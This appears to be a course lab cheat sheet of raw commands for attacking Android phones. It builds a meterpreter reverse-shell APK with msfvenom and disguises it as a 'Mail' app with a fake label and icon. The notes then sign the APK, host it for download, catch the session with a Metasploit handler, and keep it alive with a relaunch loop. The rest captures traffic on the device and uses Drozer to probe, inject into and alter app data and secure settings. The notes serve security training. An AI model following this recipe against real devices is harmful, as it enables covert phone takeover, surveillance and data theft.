RTFM for mobiles
# For Android Tamer:
install metasploit, zipalign and apache2
# for stager
msfvenom --platform android --arch dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.72.208 LPORT=8888 -f raw -o mail.apk
# for inline (worked for Samsung DUOS)
msfvenom --platform android --arch dalvik -p android/meterpreter_reverse_tcp LHOST=192.168.72.208 LPORT=4444 -f raw -o mail.apk
apktool d mail.apk
cd mail/res/values
nano strings.xml
MainActivity --> Mail
Save
cd ..
mkdir mipmap
copy icon to /res/mipmap/
AndroidManifest.xml
<application android:label="@string/app_name" android:icon="@mipmap/mail">
apktool b mail -o mail_temp.apk
keytool -genkey -v -keystore eccouncil.Keystore -alias pentestandroid -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore eccouncil.Keystore mail_temp.apk pentestandroid
sudo su -
zipalign -fv 4 mail_temp.apk /var/www/html/mail.apk
What for? zipalign is an archive alignment tool that provides important optimization to Android application (APK) files. The purpose is to ensure that all uncompressed data starts with a particular alignment relative to the start of the file. Specifically, it causes all uncompressed data within the APK, such as images or raw files, to be aligned on 4-byte boundaries. This allows all portions to be accessed directly with mmap() even if they contain binary data with alignment restrictions. The benefit is a reduction in the amount of RAM consumed when running the application.
service apache2 start
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
options
set LPORT 8888
set LHOST 192.168.72.208
set exitonsession false
exploit
When connected to meterpreter on the remote Android:
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 60
done
In meterpreter
upload /home/android/Downloads/Lab3.4/bc.sh /sdcard
shell
cd /sdcard
sh bc.sh
SHOULD SEE SMTH LIKE THIS: Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity launchParam=MultiScreenLaunchParams { mDisplayId=0 mFlags=0 } }
mount -o remount, rw /mnt
tcpdump
https://www.andreafortuna.org/2018/05/28/how-to-install-and-run-tcpdump-on-android-devices/
adb push and chmod
tcpdump -v -s 0 -w eccouncil.pc
tcpdump -v -s 0 -w com.bssys.mbcphone.)))
Drozer
adb forward tcp:31415 tcp:31415
drozer console connect
run app.package.list
run app.package.info -a [package_name]
run app.package.manifest [package_name]
run app.package.attacksurface[package_name]
run app.activity.info -a [package_name]
run app.activity.start --component [package_name]
[activity_full_name]
run app.package.info -a [package_name]
run scanner.provider.finduris -a [package_name]
run app.provider.query content://[URI_to_the_content]
run app.provider.query content:// [package_name].[provider_name] --vertical
run scanner.provider.injection -a com.android.insecurebankv2
run app.provider.insert content://com.vulnerable.im/messages
--string date 1331763850325
--string type 0
--integer _id 7
run app.provider.update content://settings/secure
--selection "name=?"
--selection-args assisted_gps_enabled
--integer value 0
run app.provider.delete content://settings/secure
--selection "name=?"
--selection-args my_setting
run app.broadcast.info -a com.android.insecurebankv2